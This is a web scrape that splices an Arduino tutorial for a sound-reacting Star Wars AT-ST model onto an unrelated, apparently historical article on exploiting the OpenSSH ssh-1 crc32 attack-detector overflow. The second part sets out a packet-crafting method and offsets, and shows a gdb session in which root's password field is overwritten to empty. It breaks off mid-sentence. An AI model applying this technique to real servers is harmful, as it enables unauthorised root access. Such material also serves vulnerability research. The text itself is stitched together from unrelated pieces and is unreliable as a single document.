The Bandai At-St Kit is one of the easiest kit available. Can be built without glue (not for this project). Painting & Weathering is suggested but not strictly necessary to achieve a nice model. This project requires some glueing:
- Ciano CA super glue On eBay Here
Plastic Model Cement (very fluid, works only on not painted plastic)
General tools
- Dremel On eBay Here
- Scissors
- An abrasive wheel (optional)
- Soldering Stain
- Soldering Iron On eBay Here
Third Hand Soldering Solder Iron Stand On eBay Here
3d Printing
- A 3d printer is required:
- to produce the joint to fix the mini servo inside the head.
- optionally, also to build the housing inside the base (i'll explain later)
Electronics tools
- A Tester / Multimeter to check connections On eBay Here
- PC or Mac to program Arduino
- Mini USB cable to program Arduino Nano (or compatible) On eBay Here
- Soldering Iron On eBay Here
- Assorted Heat Shrinkable Sleeves On eBay Here
Optional: If you don't own it, get a prototype kit:
- If the circuit get a little complicated it's very easy to mess around.
I suggest to always prototype the circuits before soldering using a prototype kit with:
- An Arduino Uno or Mega (suggested Original) everywhere you like On Ebay Here
- A Breadboard (the small one will be enough) On Ebay Here
- A base to keep it all nicely together. check this cool one from eBay available in many colours and dimensions, made in Acrylic.
- Jumper CablesOn Ebay Here
Step 3: Building the Model: Wire the Legs
Let's build the model.
You have to follow the very good instructions that comes with the Bandai model.
When it comes to Legs building, the first modification is required:
- Separate two pair of wires from the "80-wire Hard Drive Data Ribbon", longest as possible (30 cm). So you will have one double wire for one leg, and one for the other. Total 4 wires.
- You have to Insert each of these electric wires into the model form the bottom of the feets, through the legs, to the central body, and then to the head. Leave about 10 cm of wire under the feet.
- The wire is very thin, but you have to remove some portions of plastic here and there, in order to make room for the wire. Use your Craft Knife to achieve this.
Sadly i don't have much foto of this phase. So i Made instructions onto kit's user manual, to manage joints and wiring. See pics.
Attention !!! Wires are very thin, can break and can be damaged by glue (especially by plastic cement that is a solvent) and paint thinner. Be very careful. I had a very bad problem myself of this kind. Always glue the parts AFTER you checked the connection.
Step 4: Building the Model: Modify the Neck
If all has gone well, you now should have two 10cm long wires that is coming out from the neck hole into the torso. Each with 2 wires in it. Total 4 wires.
Neck Preparation
- This project requires only 3 wires to the head, so lets' abandon one wire here and to cut here and weld a new 20 cm 3 wires ribbon from "80-wire Hard Drive Data Ribbon" to 3 of the 4 wires available. Use your soldering iron and a small "Heat Shrinkable Sleeve" isolate the soldered parts. The "neck" will later be glued to the torso.
- Prepare the micro servo arm (comes with the servo) , by removing all but the circular ferrule part. Sand it.(see pic)
- Cut the upper part of the neck (see pic). You have to cut until your section's diameter will be the same diameter as the Servo arm. So there will be no step between the two.
- (optional) Prepare an Iron Nail, has to fit inside the modified servo arm hole. Will make it stronger. Pay attention: Its head has be filed to the minimum thickness you can, otherwise the servo joint will not have enough room and will not hold.
Neck Assembly
- Assemble the two halves of the neck, keeping the Wires inside it, and making a hole in the center where there the slot is. Please see pics to get it.
- On the upper top you'll glue (wit CA superglue) the Modified servo arm.
- Optionally you'll make it stronger using the Nail you've prepared.
Neck Sanding
- After drying, sand the top of the neck with sanding paper. Has to be smooth because has to have no friction while rotating.
- Then paint it, if you like...
Neck glueing
- You can glue the neck to the torsowhile assembling the two halves (in order to better manage wiring, and not have the need make room for its loop inside the torso). Or you can do it later if you want (as i did). Will be easier to work with the head, but it will be little harder to assemble it later...
DON'T FORGET TO CHECK THE WIRING WITH THE TESTER
Step 5: Build the Servo Holder
Now we have to modify the head to hold the micro servo and make it fit to the servo arm coming form the neck below. This joint will require no glue. I added 2 led2, and opened only one of the "eyes" as you can see in pics and video.
3d print the Servo Holder
- 3d Print the part with any 3d printer
- STL Available for download
As you can see the part will perfectly fit with the bottom of the head.
Glue is almost not required (but i glued it)
You can now test installing your servo, to see if all is fitting well. Also try to attach the neck and see if all is ok.
Leave the servo installed but not glued. This will let take the measurements for the next step.
Attachments
Step 6: Prepare the Head
Make room for the Micro-Servo
- To make room in the rear of the seats i managed to bring the Floor&seats part about 7mm further.
- To achieve this you'll have to:
- Cut the front part of the Seats. ( i used Dremel but you can get it with the cutter)
- Cut some millimetre also to the left and right of the Floor&seats part.
- Cut the back intermediate wall to make room for the servo
- Cut the legs and the hands of the pilot.
Then you have to make it all fitting. I recreated the back wall cutting and repositioning the previous (see pics).
I didn't install neither the right pilot, nor Chewbacca.
You really don't have to worry about these mutilations, because very little will be seen for the eye that will be left opened. Test it by yourself, and see pics for details.
I'll agree that we're loosing accuracy here. But we'll be getting this thing to move!
Paint the inside of the cockpit (if you like)
As said not much of the cockpit will be visible. If you d'like to paint it it's time to do it.
i Suggest to follow this very good tutorial if you want a great guide to paint and weather this particular cockpit and Pilot:Bandai's 1/48th scale AT-ST: Part 5 Video courtesy of Helgan35
Step 7: Embed the Servo Into the Head
Micro-servo
- A little modification has to be made here, in order to conceal the servo wires If you do not want to see the servo wires from the "eye": simply unscrew the servo top cover and make an housing on the right side of the servo, to get wires through it.
- I also decided do attach to the servo some unused cockpit part
- A blue servo inside the At-St head, is really not cool. Paint it! with primer or the color you like.
- Install the two leds: i installed the white warm led at the right of the pilot, and the orange led behind the seat of the pilot. See pictures. While not having much room i directly glued the LEDS on the servo with CA.
Cable the head
- Make an hole into the head floor to get our cable inside.
- This part will move very much so i suggest to Make a long loop to leave all the movement degrees needed.
- Add a piece of heat shrinkable sleeve where the cable enters the hole, to make it stronger.
Assemble the head
We've our 3 wires inside the At-St head.
- It is time to solder the wires (See Fritzing Schematics Pic):
- Leds
- Resistance
- Servo
- Glue all the pieces together with Cement. Use Ca if you're gluing painted parts.
- Also i glued the top part of the servo onto the 3d part with little CA (note: don't worry if you have to replace servo if gears are broken (as i did) i managed to do it by removing the top 4 screws...
Step 8: Build the Electronics
Diagram
You can find two Fritzing diagrams in this tutorial.
- the one in this step is for the testing platform, with Arduino UNO that will be attached to a PC through (or MAC)
The interference problem
As a premise i say i'm not very confident with electronics. I encountered an interference problem between the servo movement and the Mics... I managed to solve it only by dividing the power source. I know this could be done better. Please feel free to comment end suggest improvements .So i have 2 separate power circuit, one for Arduino Nano (and servo and leds (9v)). the other for microphones only (3,3v).
Prototype
I suggest you build this using the prototype set before, and then you replicate it into the model.
Once you've made it work into your prototype set, you will put into the model with Arduino nano.
So by now you should have:
- Your model Fully Assembled and painted
- Model is Completely wired and attached to the prototype kit
the head is detached form the neck.
Step 9: Program Arduino
Program
Time to program our Arduino, you have to connect it to an USB port of your pc, then open the EDI, and upload the Sketch below.
About this code i made i can say:
- it Uses Millis and not delays to do its job
- It has 3 modes:
- "Scan": It's when the machine is like scanning the environment moving slowly its head left and right.
- "AfraidSx": It's when a sound is detected on the Left. The machine turns to left, and randomly moves a it's head figuring out if there's something to shoot at.
- "AfraidDx": Same as above, but on the Right.
Sound detection will trigger one of the above modes
#include <br>
Servo servo;
int center = 115; int limitsx = 85; int limitdx = 145; int Behaviour = 1; //setta behaviuour iniziale int pos = 85; int Direction=1; byte endingAfraid = 0;
//knock const int knockSensor = 5; // the piezo is connected to analog pin 0 //const int threshold = 100; // threshold value to decide when the detected sound is a knock or not int sensorReading = 0; unsigned long millisAtKnockDx = 0;
//knock sx const int knockSensor2 = 3; // the piezo is connected to analog pin 0 //const int threshold = 100; // threshold value to decide when the detected sound is a knock or not int sensorReading2 = 0; unsigned long millisAtKnockSx = 0;
//verboselog const int VelocityCiclo1 = 1000; int CountCiclo1 = 0; unsigned long previousMillis1;
//afraiddx const int StartVelocityCiclo2 = 100; const int EndVelocityCiclo2 = 500; int CountCiclo2 = 0; unsigned long previousMillis2; byte servoSweep2 = 0;
//afraidsx const int StartVelocityCiclo4 = 100; const int EndVelocityCiclo4 = 500; int CountCiclo4 = 0; unsigned long previousMillis4; byte servoSweep4 = 0;
//ledloop const int VelocityCiclo5 = 200; int CountCiclo5 = 0; unsigned long previousMillis5; byte servoSweep5 = 0;
//scan const int VelocityCiclo3 = 130; int CountCiclo3 = 0; unsigned long previousMillis3; int pos3 = 0;
//DetectnOise int KnockDetected = 0; int PreviousKnockDetected = 0; const int VelocityCiclo6 = 500; //lentezza del ciclo di detect rumore int CountCiclo6 = 0; unsigned long previousMillis6; int NoiseTresh = 2; //soglia. abbassare per rendere meno sensibile al casino. se ho almeno 3 knock in 1000 msec allora non è un tirgeer.... int NoiseDetected = 0;
//DDelayUscita da noise const int VelocityCiclo7 = 1000; //lentezza dolp la quale tornare alla normalità... int CountCiclo7 = 0; unsigned long previousMillis7;
void setup(){ servo.attach(6); Serial.begin(9600); // initialize the serial communications 4 debug //pinMode(ControlSwitch, INPUT); // //pinMode(Led5, OUTPUT); pos3 = limitsx;
//IntLed---------------------- //led pinMode(12, OUTPUT); pinMode(11, OUTPUT); pinMode(10, OUTPUT); pinMode(9, OUTPUT); pinMode(8, OUTPUT); pinMode(7, OUTPUT); //IntLed---------------------- }
void loop(){
switch (Behaviour){ case 1: Scan(); //AfraidFr(); break;
case 2: if ((millis() <= millisAtKnockDx)) { // cicli dopo i quali tornare in scan AfraidDx(); } else { Direction=0; Behaviour = 1; endingAfraid = 1; } break;
case 3: if ((millis() <= millisAtKnockSx)) { // cicli dopo i quali tornare in scan AfraidSx(); } else { Direction=1; Behaviour = 1; endingAfraid = 1; } break; }
KnockTriggerDx(); KnockTriggerSx(); VerboseLog(); DetectNoise(); digitalWrite(12, HIGH); digitalWrite(11, HIGH); digitalWrite(10, HIGH); digitalWrite(9, HIGH); digitalWrite(8, HIGH); digitalWrite(7, HIGH); }
void KnockTriggerDx() { // read the sensor and store it in the variable sensorReading: sensorReading = digitalRead(knockSensor); // if the sensor reading is greater than the threshold: if (sensorReading == 1) { // toggle the status of the ledPin: Serial.println("Knock DX !!!!!!!!!!!"); KnockDetected++; // setto per riconoscere parlato. millisAtKnockDx = millis() + random(3000,10000); // azzero counter afraid dx if (NoiseDetected == 0){ Behaviour = 2; //vado in afraid dx } delay(200);
} }
void KnockTriggerSx() { // read the sensor and store it in the variable sensorReading: sensorReading2 = digitalRead(knockSensor2); // if the sensor reading is greater than the threshold: if (sensorReading2 == 1) { // toggle the status of the ledPin: Serial.println("Knock SX !!!!!!!!!!!"); KnockDetected++; // setto per riconoscere parlato. millisAtKnockSx = millis() + random(3000,10000); // azzero counter afraid dx if (NoiseDetected == 0){ Behaviour = 3; //vado in afraid sx } delay(200); } }
void AfraidDx(){ if (millis() >= previousMillis2){ CountCiclo2++; previousMillis2 = previousMillis2+random(StartVelocityCiclo2,EndVelocityCiclo2); // each case gets 100ms servoSweep2 = random(1,4); //seleziona caso random tra 1 e 3 /*if (servoSweep == 7){ //cicla tutti i casi servoSweep = 1; }*/ } switch (servoSweep2){ case 1: pos = limitdx-3; servo.write(pos); break; case 2: pos = limitdx-6; servo.write(pos); break; case 3: pos = limitdx; servo.write(pos); break; } // end of sweep }
void AfraidSx(){ if (millis() >= previousMillis4){ CountCiclo4++; previousMillis4 = previousMillis4+random(StartVelocityCiclo4,EndVelocityCiclo4); // each case gets 100ms servoSweep4 = random(1,4); //seleziona caso random tra 1 e 3 /*if (servoSweep == 7){ //cicla tutti i casi servoSweep = 1; }*/ } switch (servoSweep4){ case 1: pos = limitsx+3; servo.write(pos); break; case 2: pos = limitsx+6; servo.write(pos); break; case 3: pos = limitsx; servo.write(pos); break; } // end of sweep }
void LedLoop(){
}
void Scan(){
if (millis() >= previousMillis3){ if (endingAfraid == 1) { //se to uscendao da afraid resetto la pos per fluidità endingAfraid = 0; if (Direction == 0) { previousMillis3 = previousMillis2; pos3 = limitdx - 6 ; } else{ previousMillis3 = previousMillis4; pos3 = limitsx + 6 ; } } CountCiclo3++; //debug// Serial.println(pos3); previousMillis3 = previousMillis3+VelocityCiclo3 ;
if (Direction % 2) { //se dispari (da basso a alto) (da limit sx a limit dx) if(pos3 < limitdx) { pos3++; servo.write(pos3); } else { Direction++; // se ho raggiunto il limite aumenta di 1 direzione, invertendola } } else //se pari if(pos3 > limitsx) { pos3--; servo.write(pos3); } else { Direction++; // se ho raggiunto il limite aumenta di 1 direzione, invertendola }
} }
void DetectNoise() { if (millis() >= previousMillis6){ CountCiclo6++; //se dopo un po di tempo/VelocityCiclo6)... previousMillis6 = previousMillis6+VelocityCiclo6 ; // ho accumulato troppi knokkeddx ed sx.... if (PreviousKnockDetected <= KnockDetected){ // per capirlo sottracco quelli di ora - quelli previus ciclo (lento) se > x sono in noise... PreviousKnockDetected = KnockDetected+NoiseTresh; // Azzer.... NoiseTresh = soglia che vado a aggiugnere... Serial.println(); Serial.println("!!!!!!!!!!!!!!!!!!!!!!!!!!!!!noise detected!!! chi parla?????????????????"); //triggero log Serial.println(); Behaviour = 1; //e vado in modalità idonea... NoiseDetected = 1; //qs variabile impedisce ad altri knoc di cambiare behaviour x un po'.... previousMillis7 = previousMillis6+VelocityCiclo7 ; //setto dalay per rientro varaibile NoiseDetected
}else{ if (millis() >= previousMillis7){ //dopo xx ulteirori millisecondi.. CountCiclo7++; NoiseDetected = 0; //vado via dastato di noisedetected... } } PreviousKnockDetected = KnockDetected+NoiseTresh; //debug// Serial.print("trigger rilevati in unità di tempo= "); //debug// Serial.println(PreviousKnockDetected-KnockDetected); } }
void VerboseLog() { if (millis() >= previousMillis1){ CountCiclo1++; previousMillis1 = previousMillis1+VelocityCiclo1 ; // each case gets 100ms
//fun Verboselog Serial.print("| CountCiclo1= "); Serial.print(CountCiclo1);
Serial.print("| knockDX= "); Serial.print(millisAtKnockDx);
Serial.print("PreviousKnocKDetected= "); Serial.print(PreviousKnockDetected);
Serial.print("KnocKDetected= "); Serial.print(KnockDetected); Serial.print("NoiseDetectedStatus= "); Serial.print(NoiseDetected);
Serial.println("end");
}
}
Attachments
Step 10: Calibrating
As you code is uploaded you should see this thing working for the first time!
I suggest not to attach the head before checking the servo center position.
The servo Should be swiping form left to right.
Calibrating the servo
You must set (in Arduino code) your limits and center position by setting these variables:
- int center = 115;
- int limitsx = 85;
- int limitdx = 145;
NOW you can assemble the head...
...with the rest of the body, at the center servo position.
Consider not to use glue for this. If you need to use glue, be extremely careful not to weld the servo and cause it to get stuck.
Calibrating the Microphones.
Microphones has one screw on ht little board on with there mounted. This is to set the threshold limit after the Sensor tell to the arduino that a sound is detected.
You now have to find the exact threshold for each of the two.
You can achieve this by reading the monitor on the serial log on the ARDUINO IDE. Anytime a sound is detected you'll read "Knock SX !!!!!!!!!!!" or "Knock DX !!!!!!!!!!!"
If there is to much noise to trigger the pics, the "Detect noise" function will ignore the call and consider it a "noise".
Find the correct balance.
Step 11: Build the Base
Speaking about base building, there is no right way to do it as long as:
- you get the room for the batteries the electronics, the power switch
- you provide A way to keep the At-st standing on its feet
- you get the 2 microphones onto the base, one on the left, and one on the right.
Here is my way:
- Find what you want to do (studied the positions before)
- 3d print the external mould (dimensions will fit Makerbot replicator 2) (file attached)
- 3d print the Inner core (file attached)
- Cover the inner core cavities. You don't want the plaster to go inside.
- Fix the External Mould to a Wooden base.
- Position the inner core and put a weight on it (otherwise il will float into plaster).
- Prepare the plaster
- Pour the plaster into the mould
Let it dry ( for some days )
Step 12: Complete the Work
Build the final circuit
You can see above the final Fritzing circuit. As said before it has 2 batteries to solve the interference problem.
In the diagram you can see 6 leds that are supposed to light up the base. These are optional.
Do all the soldering required. And Weld all the components to the Arduino Nano.
I used this wonderful frontal Metal Led button. Check its instructions to wire it correctly.
Set the Model to the base Using 2 screws form below the base and join the wires.
Install the microphones
My base design has forced me to get to the surface of the base only with the 2 mics, and not with the entire sound detection board. So i had to Stretch the Mics wiring.To do it i detached the mic form its board and re-soldered using the two 20 cm Cd-rom audio cabled (they are shielded).
After that i put some rocks on it to conceal the two mics. And painted all in white (i know that it's an unpopular diorama design, but i like it this way)
Power it up & Enjoy it!
Be the First to Share
Recommendations
29 Comments
1 year ago
Awesome!!! Thanks for sharing... Just came across it recently, doing a build currently... Using this specific micromotor with gears from Faulhaber instead of regular servo... Fits right in the back panel, without damaging the interiors...
5 years ago
Hi. Very cool. Starting to build one using your base mould but not sure how the far plaster should go inside. Do tyou have any pictures of the process?
Thanks
5 years ago
I just ordered an arduino kit, and will be learning the ins and outs of it. My goal for this learning project is to build one of these! I build maquettes already, and can't wait to work on this! Thanks so much for sharing your knowledge!
6 years ago
You have to put that in a creepy doll....have to.
6 years ago
Is there a video of thefinal or did I just miss it?
Reply 6 years ago
Reply 6 years ago
thx
Reply 6 years ago
your welcome! i was searching for a video throughout the steps as well....This instructable is too cool not to see in action.
6 years ago
Nice arduino project, and I LOVE your battle-scars too :-)
6 years ago
The battle damage and paint job you did on this are amazing.
6 years ago
AWESOME!! Thank you for this I have this kit and was about to start building it also a fan of Tony's work "Helgan35", I had planned to just add some lighting to it but now I have to try and do this, I have a display case in living room near front door so this is a must do to have it turn towards people as they walk in EPIC...
Reply 6 years ago
yeah Helgan35 is the best! like his videos... and skills.
Reply 6 years ago
Just ordered the parts needed to do this went with free shiping on it all to save cost but will have all before christmas and plan on making this while on vacation from 12/24 though the 1/4 cant wait to have it looking at people as the walk in my place :) would like to add laser firing effect as well but not sure how to with andrino yet this is my 1st attempt at it
6 years ago
Can I replace servo with a stepper motor? I was able to connect to an L298N controller and got to work but I was unable to get microphones to work. Is there an Arduino sketch that will allow me to use both stepper motor and 2 sound sensors?
Thank you.
Reply 6 years ago
Sure, you can use a stepper motor if you get it to fit inside...
obiouvlsy my sketch wont work as it is. Has to be modified.
Into another project i made i successfully used this stepper driver:
Reply 6 years ago
Thank you. Great info and very helpful.
Reply 6 years ago
... follow this to add stepper driver code....
i hope i've been helpful!
6 years ago
Wow dude! this is very fitting for the fact that the new Star Wars film is coming out soon!
6 years ago
This masterpiece!
6 years ago
A lot of effort and a great result. Congrats. | https://www.instructables.com/Motorized-Sound-reacting-Star-Wars-At-St-Bandai-Mo/ | CC-MAIN-2022-05 | refinedweb | 4,223 | 61.06 |
This
1. Abstract
-----------
This article discusses the recently discovered security hole in the
crc32 attack detector as found in common ssh packages like OpenSSH and
derivates using the ssh-1 protocoll. There is a possible overflow during
assignemnet from 32bit integer to 16bit wide one leading to unmasked
hash table offsets.
In this article I will try to show how:
a) exploit the crc32 hole to gain remote access to accounts without
providing any password, assuming remote sshd allows empty passwords
b) change login-uid if valid account on the remote machine exists.
I'm aware about the wide consequences arising form this disclosure and
possibly some people will hate me because I wrote this, but after you
have read this article, you will see that the exploitation is really
hard and tricky but on the other hand interessting. I think that the
impact of the crc32 hole is greater than the recent bind bug. I'm not
responsible for any damage resulting from this code, if you use this on
your own.
The exploit code is a set of patches to openssh-2.1.1, but of course one
may want to put the needed routines into one code file.
Note: this is neither a typical buffer overflow exploit (shell code) nor
a format string exploit :-)
2. Details
----------
Lets look at the vulnerable code in deattack.c. I will derive few
conclusions about exploitation of the deattack code here.
Original deattack.c code taken from OpenSSH-2.1.1, interessting
locations are marked with [n]:
int
detect_attack(unsigned char *buf, u_int32_t len, unsigned char *IV)
{
static u_int16_t *h = (u_int16_t *) NULL;
static u_int16_t n = HASH_MINSIZE / HASH_ENTRYSIZE;
register u_int32_t i, j;
u_int32_t l;
register unsigned char *c;
unsigned char *d;
if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
len % SSH_BLOCKSIZE != 0) {
fatal("detect_attack: bad length %d", len);
}
[1]
for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l << 2)
;
if (h == NULL) {
debug("Installing crc compensation attack detector.");
[2] n = l;
h = (u_int16_t *) xmalloc(n * HASH_ENTRYSIZE);
} else {
if (l > n) {
n = l;
h = (u_int16_t *) xrealloc(h, n * HASH_ENTRYSIZE);
}
}
if (len <= HASH_MINBLOCKS) {
for (c = buf; c < buf + len; c += SSH_BLOCKSIZE) {
if (IV && (!CMP(c, IV))) {
if ((check_crc(c, buf, len, IV)))
return (DEATTACK_DETECTED);
else
break;
}
for (d = buf; d < c; d += SSH_BLOCKSIZE) {
if (!CMP(c, d)) {
if ((check_crc(c, buf, len, IV)))
return (DEATTACK_DETECTED);
else
break;
}
}
}
return (DEATTACK_OK);
}
memset(h, HASH_UNUSEDCHAR, n * HASH_ENTRYSIZE);
if (IV)
h[HASH(IV) & (n - 1)] = HASH_IV;
for (c = buf, j = 0; c < (buf + len); c += SSH_BLOCKSIZE, j++) {
[3] for (i = HASH(c) & (n - 1); h[i] != HASH_UNUSED;
i = (i + 1) & (n - 1)) {
if (h[i] == HASH_IV) {
if (!CMP(c, IV)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
[4] } else if (!CMP(c, buf + h[i] * SSH_BLOCKSIZE)) {
if (check_crc(c, buf, len, IV))
return (DEATTACK_DETECTED);
else
break;
}
}
[5] h[i] = j;
}
return (DEATTACK_OK);
}
[2] as wee see here, a 32bit int value is assigned to 16bit wide only
one. Bad things happen, if n is assigned a (truncated) value 0, because
the value of n-1, where nwould expand to 32bit before the calculation is
made is used as bit mask for following hash table operation [3]. Because
l is computed to be a power of 4 in [1], we do not need to know the
exact value for the len argument of detect_attack. We will end with n
beeing exactly 0 if len is big enough. The overflow happens at exactly
LEN = (16384 / HASH_FACTOR) * SSH_BLOCKSIZE which is 87381.
So now we know how to set n to 0. Simply send a ssh1 packet with size
exceeding LEN. But are we able to send such long packets? The answer is
yes, after looking at the code of packet handling code in packet.c we
see that the maximum accepted packet len is 256 kbytes.
But what we can do with this? The answer is simple: after the value of n
has been set to 0, we can access all sshd's memory by providing
out_of_range hash indexes which are taken as (network order) values from
the packet buffer itself (due to the HASH function beeing simple
GET_32BIT), whose have to be 'unsigned short' index values. The
detect_attack code will scan 8 bytes long blocks checking them for crc32
attack using only the first 4 bytes of each block as hash table index.
So we can set the other half of the buf blocks to arbitrary values
without consequences to what we are indexing.
So having n=0 we can change really any value in the memory! For example
to write to the variable X having the value V we need to supply the Vth
buf block with an offset to X in server's memory, offset because it
would be calculated relative to the value of 'h', which has been
allocated by a call to xm(re)alloc(). The value of h has indeed to be
guessed, though (or in other words we need to guess the offset to h).
But this would only write V to to X because 'j' which is the value we
write in [5] counts blocks in buf. As you see from [3] and [4] there is
a condition for writing to memory. The block number V has to be
identical with the block obtained by buf + h[i] * 8, which means that we
need 2 blocks: first a 'self termination' block with the number V and
another block with the number 'k' where k is the new value we want to
write to X. Note that with this technique we can only increase the value
of X !
There are 2 other conditions: the UNUSED_HASH and the HASH_IV condition,
though, I do not discuss them here.
Lets analyse the condition we need to enter detect_attack code at all.
From packet.c it can bee seen that we need the session key to be set, so
the first posibility to enter detect_attack is after the ssh_kex code in
auth1.c. This makes the exploitation a bit tricky, because we need to
send encrypted packets.
So one may ask, how to send an encrypted packet containing the needed
offsets if we must always encrypt our data before sending? We can deal
with it easilly maintaning a copy of the receive context as sshd sees
it. After the seesion key has been set (it is the same for sending and
receiving) we need to _decrypt_ all packets we send to sshd. With this
trick we are able to produce the plaintext needed for construction of
desired encrypted packet :-)
Let us look at the format of ssh-1 packets. They are always 8*n (packets
containing other data amount are padded) bytes long and contains an
(encrypted!) checksum at the end of packet:
(LEN)[001][002][003][004]...[XXX]
where [...] stands for a 8-byte long block and (LEN) is a 32 bit value
carrying the length information (network order!). The last [XXX] block
would be like
[PPPPCCCC]
with P standing for padding or data and C for the crc32 checksum. The
checksum is calculated over all packet bytes _excluding_ the checksum
location but including the last 32 bits of the packet (padding or data)
and then stored at the end of packet and after that the resulting packet
is encrypted with the current cipher context (usually send_context in
packet.c).
There are 2 another difficulties too, one can point out. The first is
that after we have sent a big packet setting 'n' in detect_attack to 0,
n will be still 0 in succeding calls and this will result in an endles
loop in [1]. Therefore our packet _must_ overwrite the static variable n
in detect_attack subroutine!
Because we have xrealloc'ed the buffer h with the new size =
n*HASH_ENTRYSIZE which would expand to 0, the buffer h cannot be assumed
to point to any valid memory... So the only way to deal with this is to
send only _small_ packets matching the condition len < HASH_MINBLOCKS
(=56). For example we have to disable tty allocation (-T option) in the
following exploit code. Never enter more than about 36 bytes on the
prompt :-)
The second real hard problem is the value of PPPP. detect_attack will
scan the buf for crc32 compensation attack _including_ the last block
with crc and pad. But we cannot really controll the encrypted value of P
because the ciphers work always on 8 byte long blocks mixing the 2 32bit
values with each other (I didn't found any simple way to deal with this,
cryptography experts, where are you?!). So the question is: how the PPPP
bytes have to be in order to obtain defined encrypted value at the P's
position _after_ we calculated the cheksum? I doubt that this problem is
solvable at all. However, I use at this point the UNUSED_HASH
termination condition. After n has been set again by our big packet to a
value != 0 we need to match the condition h[PPPP & n-1] == 0xffff. See
below to understand how I'm doing this ;-)
So now we know all about the detect_attack code and the packet format,
lets think about really exploiting this. After I have looked at the
authorisation code auth1.c I found 3 ways of possible exploitation in
the do_authloop function:
a) there is a local variable 'int authenticated = 0' which set to value
!= 0 would authorise the session and start a remote shell immediatelly.
b) overwriting the pw->pw_passwd value which should be 'x'\000 on
systems with shadow passwords with something like \000'x' would produce
a remote shell too if sshd has 'emptypasswords' enabled.
c) overwriting pw->pw_uid with some value would change the uid the
remote shell is running after successfull athentication.
You will very fast figure out, why (a) is not easy exploitable (if at
all...).
It is time to describe an exploitation way for (b), which I decided to
choose for this article. Exploiting (c) would be similiar but not really
interesting, I think, because we can only increment the uid value.
Lets summarize, how our (very very...) magic and big packet has to look
like:
- we put as first cipher block an offset pointing to the location of n
in detect_attack(), so first write h[i]=j will set n=0
- we make the 0x78th block to point to the location of pw->pw_passwd
(which point to somewhat like 0x78 0x00 ... at this time), this is our
termination block for pw->pw_passwd. h[i]=j wouldn't change the value
pw->pw_passwd is pointing to
- we make the 0x100th block to point to pw->pw_passwd again, so that
h[i]=j would change the value *(pw->pw_passwd) to be now 0x00 0x01
(which is an empty string, say no password :-)
- the 512th cipher block has to change n in detect_attack() to be 512 so
no deadlock occurs in succeding calls to detect_attack().
- other cipher block offsets have to be 0x00000000.
- and finally we choose the last free (padding) value PPPP of the packet
to match following condition: network_order(PPPP) & 511 == 0 (brute
force that, PPPP would be found very fast...) so that we still have an
_effective_ offset 0x00000000. After I played a bit with this, I found
that it is not really necessary to bother about PPPP...
There are few other modifications to the ssh code, though. I mention
only that before we send our magic big packet there will be a
'0xffff-setting' packet, only to set up the h buffer with 0xffff values
;-)
Another modification I made is sending empty password after we have sent
the long packet in sshconnect1.c. You will find other minor changes on
yourself...
3. Exploit
----------
Attached are diff files for the openssh-2.1.1 package. The patch uses 2
environment variables called 'OFF' and 'NOFF', where OFF has to be the
offset to the variable we want to overwrite (pw->pw_passwd), NOFF the
offset to stattic variable 'n' in the detect_attack code.
To finish this discussion lets look at some successfull exploitation of
sshd. I have run sshd in gdb in debugging mode to simplify this show,
but you can try the code with your own 'real' sshd of course, using
apriopriate offsets...
on the client side:
./ssh -v -p 7777 localhost 2>&1 -c blowfish -T -l root
where -T prevents from sending ALLOC_PTY packet, which would exceed the
56 bytes limit, on the server side:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /usr/home/paul/tmp2/openssh-2.1.1p4/./sshd -p 7777 -d
-f ./sshd_config -b 512 2>&1
debug: sshd version OpenSSH_2.1.1
debug: Seeding random number generator
debug: read DSA private key done
debug: Seeding random number generator
debug: Bind to port 7777 on 0.0.0.0.
Server listening on 0.0.0.0 port 7777.
Generating 512 bit RSA key.
debug: Seeding random number generator
debug: Seeding random number generator
RSA key generation complete.
debug: Server will not fork when running in debugging mode.
Connection from 127.0.0.1 port 3743
debug: Client protocol version 1.5; client software version
OpenSSH_2.1.1
debug: Local version string SSH-1.99-OpenSSH_2.1.1
debug: Sent 512 bit public key and 1024 bit host key.
debug: Encryption type: blowfish
debug: stored copy of send context
debug: Received session key; encryption turned on.
Breakpoint 1, detect_attack (
buf=0x80f9d14
"VÉzZí\236\005\035b¬I\205:I@N4c;\r\227³W\204ËÔ\022ƵlT\aO\025¡®Ë6\227+w\177úN\032@\017°$·Kë\230óCbÄ\225,_~(\bîЩl6136
if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) c
Continuing.
debug: Installing crc compensation attack detector.
debug: Attempting authentication for root.
(here I have added some debugging code to detect_attack in order to
easilly gain offsets :-)
debug: PASSWORD ADR = 0xbffff08c : 80f8890 80f9c88 0
debug: passwd = [x]
debug: name = [root]
Breakpoint 1, detect_attack (
buf=0x80f9d14
"q9\216\203Èac]uuE\235A\013nQ\022·\003oj8Üo+[\eë\207Xÿ®r[ó7\233\030«ß%ÏÍ·ÙRò\207l1\230y¿(\211¡\004\207\037
\027&
len=528, IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) x 0x80f9c88
0x80f9c88: 0x400c0078
As we see here, 0x400c0078 is the stored 'x'\000 value from /etc/passwd,
which indicates that root has a shadow password.
(gdb) p len
$15 = 528
the packet received is the '0xffff' packet which would prepare the
memory region h with UNUSED_HASH values, ok lets continue:
(gdb) c
Continuing.
Unknown message during authentication: type 248
debug: Unknown message during authentication: type 248
Failed bad-auth-msg-248 for ROOT from 127.0.0.1 port 3743
ok, sshd ignored the 0xffff packet, the client side is guessing now the
value of PPPP. Lets see what happens as next:
Breakpoint 1, detect_attack (buf=0x8100144 "\177þa0ÿÿÿÿ", len=88072,
IV=0x0) at deattack.c:136
136 if (len > (SSH_MAXBLOCKS * SSH_BLOCKSIZE) ||
(gdb) p len
$16 = 88072
(gdb) p n
$17 = 4096
Got big packet! Lets step into the detect_atack code:
(gdb) n
140 for (l = n; l < HASH_FACTOR(len / SSH_BLOCKSIZE); l = l
<< 2)
.
.
.
(gdb) p n
$18 = 0
So now we have set n=0 and n-1 = 0xffffffff and can overwrite memory ;-)
After few loops we check again the location of pw->pw_passwd:
(gdb) x 0x80f9c88
0x80f9c88: 0x400c0100
Oooops, root seems to have no password now! Lets run the loop a bit
longer:
(gdb) p n
$25 = 512
(gdb) p j
$26 = 785
We see that at this point we have set n back to be 0x200 and can enter
